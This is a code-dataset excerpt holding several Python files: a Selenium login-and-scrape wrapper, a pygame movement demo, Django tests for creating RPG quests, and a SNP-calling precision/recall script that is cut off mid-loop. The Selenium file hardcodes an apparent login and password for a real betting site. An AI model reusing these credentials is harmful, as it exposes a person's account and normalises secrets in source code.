"usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 186, "usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 186, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 188, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 197, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 203, "usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 203, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 205, "usage_type": "call"}]} +{"seq_id": "545889766", "text": "import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n### A basic wrapper to selenium for scraping data\n## - driver - the selenium web browser driver\n## - username - username for login\n## - password - password for login\n## - url_home - The url to navigate to when the browser is created\n## - url_login - The url to use when we login.\n## - url_post_login - The url to navigate to after login\n\n## - actions - A list of actions to do at given urls.\n\n## - get_url() - get current url\n## - set_url() - Navigate to a new url\n\n\n\n### An object that can describe anything. \n### It accepts any parameter to initialize,\n### including type, a variable that can be used to better describe this object\nclass AbstractObject(dict):\n\n \n def __init__(self, **kwargs):\n for key, value in kwargs.items():\n self.__setattr__(key, value)\n \n def __str__(self):\n string = \"<\" + self.type + ': '\n for variable, value in self.__dict__.items():\n string += variable + \"=\" + str(value) + \", \"\n return string + \">\"\n \n \n \n### An abstract wrapper for selenium. \n### This will allow selenium to preform basic actions, \n### for which there is a list that requires some customization, with some basic navigation.\n### Because we inherit from AbstractObject this class too can be customized and expanded very easily.\n### Adding a key to the _attrs dict will result in a new variable inside the object.\n### A named action list will allow functions to be added on the fly even after creation of an object.\nclass SeleniumHandler(AbstractObject):\n _attrs = {\n 'driver':None, # Selenium webdriver\n 'username':'', # for login\n 'password':'', # for login\n 'url_home':'', # The sites home url\n 'url_login':'', # The url used to login to the site (sometimes can be the same as home url)\n 'url_post_login':'', # The url we want to navigate to after login\n 'nav_time':2, # How long we wait after we go to a new url\n 'actions':{}, # Custom actions called by controller (scraper.py)\n 'is_logged_in': False,\n 'login_action_name': 'Login',\n }\n \n def __init__(self, **kwargs):\n for var, val in SeleniumHandler._attrs.items():\n if var not in kwargs:\n kwargs[var] = val\n \n super(SeleniumHandler, self).__init__(**kwargs)\n if (self.driver):\n self.driver\n \n def add_action(self, action_class):\n action = action_class(self)\n self.actions[action.name] = action\n self.__setattr__(action.name, action)\n print (\"[+] \", action_class.__name__) \n \n def get(self, url):\n if (url == \"\"): return\n self.driver.get(url)\n time.sleep(self.nav_time)\n \n def home(self):\n self.get(self.url_home)\n \n \n ### Call the login action only if there is one.\n ### We can do this from the home page if this site can login from the home site\n ### Otherwise go to login url if there is one.\n \n def login(self, redirect = True):\n results = None\n if self.login_action_name not in self.actions.keys(): return results\n \n # the action here is the login action. It is an object. We can call action.Login() on it.\n action = self.actions[self.login_action_name]\n\n # Login if we are at the home page and we can login from the home page\n if self.is_home() and self.can_login_from_home():\n \n print(\"before action.invoke : \",redirect)\n \n action.invoke(post_login_redirect = redirect)\n \n print(\"after action.invoke : \",redirect)\n \n # Otherwise \n \n else: \n self.get(self.url_login)\n results = action.invoke(post_login_redirect = redirect)\n if (results is not None):\n self.is_logged_in = True\n \n return results\n \n \n def is_home(self): return self.current_url == self.url_home\n def current_url(self): return self.driver.current_url\n def can_login_from_home(self): return self.url_home == self.url_login\n\n\n\n\n\n\n\n\n\n\nclass StrikerdotHandler(SeleniumHandler):\n def __init__(self):\n variables = {\n \"type\":\"Handler\",\n 'driver': webdriver.Firefox(),\n 'username': 'R1036', 'password': 'yeet3',\n 'url_home': 'http://www.strikerdot.com',\n 'url_login': 'http://www.strikerdot.com',\n 'url_post_login': \"https://www.strikerdot.com/sports.html?livebettingEZ=ready?logged=1#!\",\n }\n super(StrikerdotHandler, self).__init__(**variables)\n ", "sub_path": "selenium_handler.py", "file_name": "selenium_handler.py", "file_ext": "py", "file_size_in_byte": 4914, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 133, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 133, "usage_type": "name"}]} +{"seq_id": "508619205", "text": "import pygame\nimport math\nimport numpy\n \nclass game:\n def __init__(self):\n self.running = True\n self.size = self.width, self.height = 1280, 720\n self.screen = pygame.display.set_mode(self.size)\n self.bg = (192,192,192)\n\n self.square = [[1,2],[1,4],[-1,4],[-1,2]]\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self.running = False\n \n elif event.type == pygame.KEYDOWN:\n if event.unicode == \"w\":\n for point in self.square:\n point[1] -= 0.01\n elif event.unicode == \"s\":\n for point in self.square:\n point[1] += 0.01\n elif event.unicode == \"d\":\n for point in self.square:\n point[0] -= 0.01\n elif event.unicode == \"a\":\n for point in self.square:\n point[0] += 0.01\n\n elif event.key == pygame.K_ESCAPE:\n self.running = False\n \n elif event.type == pygame.MOUSEMOTION:\n mdir = pygame.mouse.get_rel()[0]\n if mdir > 0:\n for point in self.square:\n temp = point[0]*math.cos(0.01) - (point[1])*math.sin(0.01)\n point[1] = point[0]*math.sin(0.01) + (point[1])*math.cos(0.01)\n point[0] = temp\n elif mdir < 0:\n for point in self.square:\n temp = point[0]*math.cos(-0.01) - (point[1])*math.sin(-0.01)\n point[1] = point[0]*math.sin(-0.01) + (point[1])*math.cos(-0.01)\n point[0] = temp\n\n def loop(self):\n self.screen.fill(self.bg)\n vertex = []\n \n for edge in self.square:\n xpos = self.width/2 + math.atan(edge[0]/edge[1])*2*self.width/math.pi\n hpos = math.atan(1/(edge[0]**2+edge[1]**2)**0.5)*2*self.height/math.pi\n mid = self.height/2\n vertex += [[xpos,mid+hpos],[xpos,mid-hpos]]\n\n vs = len(vertex)\n \n dist = []\n for i in range(0,4):\n dist_x = (self.square[i][0] + self.square[(i+1)%4][0])/2\n dist_y = (self.square[i][1] + self.square[(i+1)%4][1])/2\n dist += [(dist_x**2 + dist_y**2)**0.5]\n\n dist = numpy.argsort(numpy.array(dist))\n \n for i in (2*dist[::-1]):\n if i%4 == 0:\n pygame.draw.polygon(self.screen, [128,128,128], [vertex[i],vertex[i+1],vertex[(i+3)%vs],vertex[(i+2)%vs]])\n else:\n pygame.draw.polygon(self.screen, [96,96,96], [vertex[i],vertex[i+1],vertex[(i+3)%vs],vertex[(i+2)%vs]])\n \n def execute(self):\n pygame.init()\n pygame.event.set_grab(True)\n pygame.key.set_repeat(1,1)\n pygame.mouse.set_visible(False)\n \n while self.running:\n for event in pygame.event.get():\n self.on_event(event)\n \n self.loop()\n pygame.display.flip()\n \n pygame.quit()\n\nkeal = game()\nkeal.execute()\n", "sub_path": "input_demo.py", "file_name": "input_demo.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.display.set_mode", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_rel", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 36, "usage_type": "attribute"}, {"api_name": "math.cos", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 40, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 44, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 44, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 45, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 45, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 53, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 53, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 54, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.draw.polygon", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 72, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.event.set_grab", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.mouse.set_visible", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "214926306", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTests process for creating a quest.\n\"\"\"\nfrom braces.views import LoginRequiredMixin\nfrom django import forms\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import CreateView\nfrom mock import patch, PropertyMock\nfrom characters.mixins import NoAvailableCharactersMixin\nfrom characters.models import Character\nfrom characters.tests.utils import CharacterUtils\nfrom characters.views import CharacterListView\nfrom quests.models import Quest, Post\nfrom rpg_auth.tests.utils import CreateUserMixin\nfrom world.mixins import LocationFromRequestMixin\nfrom world.models import Location\nfrom world.views import ContinentListView\n\n\nclass SelectLocationTestCase(CreateUserMixin):\n \"\"\"\n Tests that users can create quests\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(SelectLocationTestCase, self).setUp()\n self.character_1 = CharacterUtils.create_character(self.user)\n\n def test_view_to_select_location_renders(self):\n \"\"\"\n A view must exist allowing a user to select a location to quest in.\n \"\"\"\n response = self.client.get(reverse('quests:select_location'))\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, ContinentListView))\n self.assertTemplateUsed(response, 'quests/select_location.html')\n\n def test_user_must_be_logged_in_to_select_location(self):\n \"\"\"\n A user must be logged in to select the location of a quest.\n \"\"\"\n self.client.logout()\n response = self.client.get(reverse('quests:select_location'))\n self.assertRedirects(response, '{0}?next={1}'.format(\n reverse('rpg_auth:login'), reverse('quests:select_location')\n ))\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_if_not_characters_available_show_another_template(self, patched_available_characters):\n \"\"\"\n If the user has no available characters then a different template should be used.\n \"\"\"\n patched_available_characters.return_value.count.return_value = 0\n response = self.client.get(reverse('quests:select_location'))\n self.assertTemplateUsed(response, 'characters/no_characters_available.html')\n\n\nclass SelectCharacterTestCase(CreateUserMixin):\n \"\"\"\n Tests that if the user has selected a location they can also select a character.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(SelectCharacterTestCase, self).setUp()\n self.location_1 = Location.objects.get(pk=1)\n self.character_1 = CharacterUtils.create_character(self.user)\n self.character_2 = CharacterUtils.create_character(self.user)\n\n def test_view_to_select_character_renders(self):\n \"\"\"\n Tests that given a valid location, a user's characters are listed.\n \"\"\"\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, CharacterListView))\n self.assertTemplateUsed(response, 'quests/select_character.html')\n self.assertEquals(response.context['location'], self.location_1)\n\n def test_invalid_location_gives_404(self):\n \"\"\"\n Tests if an invalid location is given a 404 is raised.\n \"\"\"\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': 'fake-slug'}))\n self.assertEquals(response.status_code, 404)\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_object_list_is_only_available_characters(self, patched_available_characters):\n \"\"\"\n The object list should only contain characters that are available.\n \"\"\"\n available_characters = Character.objects.filter(pk=1)\n patched_available_characters.return_value = available_characters\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertEquals(response.context['object_list'], available_characters)\n self.assertTrue(self.character_2 not in response.context['object_list'])\n\n @patch('characters.models.CharacterProfile.has_available_characters', new_callable=PropertyMock)\n def test_if_not_characters_available_show_another_template(self, patched_has_available_characters):\n \"\"\"\n If the user has no available characters then a different template should be used.\n \"\"\"\n patched_has_available_characters.return_value = False\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertTemplateUsed(response, 'characters/no_characters_available.html')\n\n\nclass CreateQuestTestCase(CreateUserMixin):\n \"\"\"\n Tests that a quest can be created once a user has selected the location and the character to start.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(CreateQuestTestCase, self).setUp()\n self.location_1 = Location.objects.get(pk=1)\n self.character_1 = CharacterUtils.create_character(self.user)\n self.character_2 = CharacterUtils.create_character(self.user)\n\n def test_create_view_renders(self):\n \"\"\"\n The view to create a quest should render.\n \"\"\"\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_1.pk},\n )\n )\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, CreateView))\n self.assertTrue(issubclass(response.context['view'].__class__, NoAvailableCharactersMixin))\n self.assertTrue(issubclass(response.context['view'].__class__, LocationFromRequestMixin))\n self.assertTrue(issubclass(response.context['view'].__class__, LoginRequiredMixin))\n self.assertTemplateUsed(response, 'quests/quest_form.html')\n self.assertEquals(response.context['location'], self.location_1)\n self.assertEquals(response.context['character'], self.character_1)\n self.assertEquals(len(response.context['form'].fields), 3)\n\n self.assertIsInstance(response.context['form'].fields['title'], forms.CharField)\n self.assertTrue(response.context['form'].fields['title'].required)\n\n self.assertIsInstance(response.context['form'].fields['description'], forms.CharField)\n self.assertIsInstance(response.context['form'].fields['description'].widget, forms.Textarea)\n self.assertTrue(response.context['form'].fields['description'].required)\n\n self.assertIsInstance(response.context['form'].fields['first_post'], forms.CharField)\n self.assertIsInstance(response.context['form'].fields['first_post'].widget, forms.Textarea)\n self.assertTrue(response.context['form'].fields['first_post'].required)\n\n def test_invalid_character_gives_404(self):\n \"\"\"\n If an invalid PK is provided for a character a 404 error is returned.\n \"\"\"\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': 999},\n )\n )\n self.assertEquals(response.status_code, 404)\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_unavailable_character_gives_404(self, patched_available_characters):\n \"\"\"\n If another user's character is provided then a 404 should be raised.\n \"\"\"\n patched_available_characters.return_value = Character.objects.filter(pk=self.character_1.pk)\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_2.pk},\n )\n )\n self.assertEquals(response.status_code, 404)\n\n def test_quests_have_initialise_method(self):\n \"\"\"\n Quests should have an initialise method that sets the character, location\n and the GM.\n \"\"\"\n quest = Quest(title=u'Title', description=u'description')\n quest.initialise(\n gm=self.user.quest_profile,\n first_post=u'first post',\n location=self.location_1,\n character=self.character_1,\n )\n self.assertEquals(quest.gm, self.user.quest_profile)\n self.assertTrue(self.character_1 in quest.current_characters)\n self.assertEqual(self.location_1, quest.current_location)\n post = Post.objects.get(pk=1)\n self.assertEquals(self.character_1, post.character)\n self.assertEquals(self.location_1, post.location)\n self.assertEquals(u'first post', post.content)\n\n def test_creating_a_quest_sets_first_post_characters_and_location(self):\n \"\"\"\n When a quest is created the logged in user should be set as the GM.\n \"\"\"\n valid_data = {\n 'title': u'Title 1',\n 'description': u'Description 1',\n 'first_post': u'first post',\n }\n response = self.client.post(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_1.pk},\n ),\n data=valid_data,\n follow=True,\n )\n quest = Quest.objects.get(pk=1)\n self.assertRedirects(response, quest.get_absolute_url())\n self.assertEquals(quest.gm, self.user.quest_profile)\n self.assertTrue(self.character_1 in quest.current_characters)\n self.assertEqual(self.location_1, quest.current_location)\n post = Post.objects.get(pk=1)\n self.assertEquals(quest, post.quest)\n self.assertEquals(self.character_1, post.character)\n self.assertEquals(self.location_1, post.location)\n self.assertEquals(u'first post', post.content)\n message = list(response.context['messages'])[0]\n self.assertEqual('{0} has begun!'.format(u'Title 1'), unicode(message.message))\n self.assertTrue('success' in message.tags)\n\n\nclass QuestDetailViewTestCase(CreateUserMixin):\n \"\"\"\n Tests that there is a detail view for quests.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def test_detail_view_renders(self):\n \"\"\"\n It should be possible to view a quest.\n \"\"\"\n quest = Quest.objects.create(\n title=u'title', description=u'description', slug=u'slug', gm=self.user.quest_profile\n )\n response = self.client.get(reverse('quests:quest_detail', kwargs={'slug': quest.slug},))\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.context['object'], quest)\n", "sub_path": "quests/tests/test_create_quests.py", "file_name": "test_create_quests.py", "file_ext": "py", "file_size_in_byte": 11072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 21, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 29, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 29, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "world.views.ContinentListView", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 50, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 50, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "world.models.Location.objects.get", "line_number": 68, "usage_type": "call"}, {"api_name": "world.models.Location.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "world.models.Location", "line_number": 68, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 69, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 69, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 70, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 70, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 76, "usage_type": "call"}, {"api_name": "characters.views.CharacterListView", "line_number": 78, "usage_type": "argument"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 86, "usage_type": "call"}, {"api_name": "characters.models.Character.objects.filter", "line_number": 94, "usage_type": "call"}, {"api_name": "characters.models.Character.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "characters.models.Character", "line_number": 94, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 96, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 89, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 89, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 106, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 100, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 100, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 110, "usage_type": "name"}, {"api_name": "world.models.Location.objects.get", "line_number": 118, "usage_type": "call"}, {"api_name": "world.models.Location.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "world.models.Location", "line_number": 118, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 119, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 119, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 120, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 120, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 127, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 133, "usage_type": "argument"}, {"api_name": "characters.mixins.NoAvailableCharactersMixin", "line_number": 134, "usage_type": "argument"}, {"api_name": "world.mixins.LocationFromRequestMixin", "line_number": 135, "usage_type": "argument"}, {"api_name": "braces.views.LoginRequiredMixin", "line_number": 136, "usage_type": "argument"}, {"api_name": "django.forms.CharField", "line_number": 142, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 142, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 145, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 145, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 146, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 146, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 149, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 149, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 150, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 158, "usage_type": "call"}, {"api_name": "characters.models.Character.objects.filter", "line_number": 170, "usage_type": "call"}, {"api_name": "characters.models.Character.objects", "line_number": 170, "usage_type": "attribute"}, {"api_name": "characters.models.Character", "line_number": 170, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 172, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 165, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 165, "usage_type": "name"}, {"api_name": "quests.models.Quest", "line_number": 184, "usage_type": "call"}, {"api_name": "quests.models.Post.objects.get", "line_number": 194, "usage_type": "call"}, {"api_name": "quests.models.Post.objects", "line_number": 194, "usage_type": "attribute"}, {"api_name": "quests.models.Post", "line_number": 194, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 209, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects.get", "line_number": 216, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects", "line_number": 216, "usage_type": "attribute"}, {"api_name": "quests.models.Quest", "line_number": 216, "usage_type": "name"}, {"api_name": "quests.models.Post.objects.get", "line_number": 221, "usage_type": "call"}, {"api_name": "quests.models.Post.objects", "line_number": 221, "usage_type": "attribute"}, {"api_name": "quests.models.Post", "line_number": 221, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 231, "usage_type": "name"}, {"api_name": "quests.models.Quest.objects.create", "line_number": 241, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects", "line_number": 241, "usage_type": "attribute"}, {"api_name": "quests.models.Quest", "line_number": 241, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 244, "usage_type": "call"}]} +{"seq_id": "468508638", "text": "import os\nimport sys\nimport json\nfrom datetime import datetime\n\nconfig_file = open(sys.argv[1])\ndata = json.load(config_file)\nconfig_file.close()\n\nprog_version = data[\"ProgVer\"]\nprog_path = data[\"ProgPath\"]\ndata_dir = data[\"DataPath\"][\"DataDir\"]\nref_dir = data[\"DataPath\"][\"RefDir\"]\ngenome_fn = data[\"DataPath\"][\"GenomeFile\"]\nsnp_fn = data[\"DataPath\"][\"SNPProfFile\"]\nread_dir = data[\"DataPath\"][\"ReadDir\"]\nindex_dir = data[\"DataPath\"][\"IndexDir\"]\nresult_dir = data[\"DataPath\"][\"ResultDir\"]\nread_fn = data[\"DataPath\"][\"ReadPrefixFile\"]\n\nconfi = float(sys.argv[2])\ncpu_num = sys.argv[3]\ncov_num = sys.argv[4]\nresult_dn = sys.argv[5]\n\nref_path = os.path.join(data_dir, ref_dir)\nread_path = os.path.join(data_dir, read_dir)\n\ngenome_file = os.path.join(ref_path, genome_fn)\nsnp_file = os.path.join(ref_path, snp_fn)\n\nref_len = 249250621\nref_para = ['0.70', '0.75', '0.80', '0.85', '0.90', '0.95', '0.96', '0.97', '0.98', '0.99']\nread_lens = [100]\nseq_errs = ['0.00015-0.0015']\nmax_snum = [2**i for i in range(3, 14)]\nread_nums = []\nif cov_num == \"all\":\n read_nums = [cov*ref_len/(2*read_lens[0]) for cov in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 25]]\nelse:\n read_nums = [cov*ref_len/(2*read_lens[0]) for cov in [int(cov_num)]]\n\nfor para in ref_para[0:1]:\n\n true_snp_comp, true_indel_comp, true_snp_none, true_indel_none = {}, {}, {}, {}\n variant_comp_file = os.path.join(ref_path, \"variant_comp_\" + para + \".txt\")\n variant_none_file = os.path.join(ref_path, \"variant_none_\" + para + \".txt\")\n\n with open(variant_comp_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[1]) == 1 and value[1] != \".\":\n true_snp_comp[int(value[0])] = value[1]\n else:\n true_indel_comp[int(value[0])] = value[1]\n\n with open(variant_none_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[1]) == 1 and value[1] != \".\":\n true_snp_none[int(value[0])] = value[1]\n else:\n true_indel_none[int(value[0])] = value[1]\n\n KAKS, NS = len(true_snp_comp), len(true_snp_none)\n KAKID, NID = len(true_indel_comp), len(true_indel_none)\n\n result_path = os.path.join(data_dir, result_dir, \"isc_\" + para, result_dn)\n result_file_path = result_path + \"/\" + read_fn + \"_\" + str(read_lens[0]) + \".\" + str(seq_errs[0]) + \".prec-rec-time-mem.\" + str(confi) + \".all-pos.txt\"\n result_file = open(result_file_path, \"w\")\n\n header = [\"Alg\", \"cov\", \"qual\", \\\n \"S\", \"P-S\", \"R-S\", \"FP\", \"TP\", \"FP-S@Other\", \"P-S@None\", \"R-S@None\", \"P-S@Comp\", \"R-S@Comp\", \\\n \"I\", \"P-I\", \"R-I\", \"FP-I@Other\", \"P-I@None\", \"R-I@None\", \"P-I@Comp\", \"R-I@Comp\", \\\n \"S@None\", \"TP-S@None\", \"FP-S@None\", \"S@Comp\", \"TP-S@Comp\", \"FP-S@Comp\", \\\n \"I@None\", \"TP-I@None\", \"FP-I@None\", \"I@Comp\", \"TP-I@Comp\", \"FP-I@Comp\", \\\n \"run\", \"read\", \"proc\", \"max_snum\", \"max_ps_num\", \"na_num\", \"na_ratio\", \\\n \"timeI\", \"memI\", \"timeC\", \"memC\", \"input_para\", \"para\"]\n\n result_file.write(\"\\t\".join(header))\n result_file.write(\"\\n\")\n\n for rl in read_lens:\n for err in seq_errs:\n for rn in read_nums:\n for ms in max_snum[6:7]:\n prefix_fn = read_fn + \"_\" + str(rl) + \".\" + str(err) + \".\" + str(rn) + \".\" + str(ms)\n called_snp_file = os.path.join(result_path, prefix_fn + \".snpcall.\" + str(cpu_num) + \".vcf\")\n snp = {}\n with open(called_snp_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[2]) >= 1 and float(value[2]) >= confi:\n snp[int(value[0]) - 1] = value[1]\n\n result_file.write(\"\\t\".join([prog_version, \"%.0f\" % (2.0*int(rn)*int(rl)/ref_len), str(confi)]) + \"\\t\")\n\n TP_KAKS, TP_NS = 0, 0\n FP_KAKS, FP_NS = 0, 0\n TP_KAKID, TP_NID = 0, 0\n FP_KAKID, FP_NID = 0, 0\n FP_S, FP_ID = 0, 0\n for key, value in snp.iteritems():\n if key in true_snp_comp or key in true_indel_comp:\n if key in true_snp_comp:\n if value == true_snp_comp[key]:\n TP_KAKS += 1\n else:\n FP_KAKS += 1\n elif key in true_indel_comp:\n if value == true_indel_comp[key]:\n TP_KAKID += 1\n else:\n FP_KAKID += 1\n elif key in true_snp_none or key in true_indel_none:\n if key in true_snp_none:\n if value == true_snp_none[key]:\n TP_NS += 1\n else:\n FP_NS += 1\n elif key in true_indel_none:\n if value == true_indel_none[key]:\n TP_NID += 1\n else:\n FP_NID += 1\n else:\n if len(value) == 1:\n FP_S += 1\n else:\n FP_ID += 1\n\n result_file.write(str(KAKS + NS) + \"\\t\")\n if TP_KAKS + FP_KAKS + TP_NS + FP_NS + FP_S != 0 and KAKS + NS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS + TP_NS)/float(TP_KAKS + TP_NS + FP_KAKS + FP_NS + FP_S)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS + TP_NS)/float(KAKS + NS)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(\"%.5d\\t\" % (FP_KAKS + FP_NS + FP_S))\n result_file.write(\"%.5d\\t\" % (TP_KAKS + TP_NS))\n\n result_file.write(str(FP_S) + \"\\t\")\n if TP_NS + FP_NS != 0 and NS != 0:\n 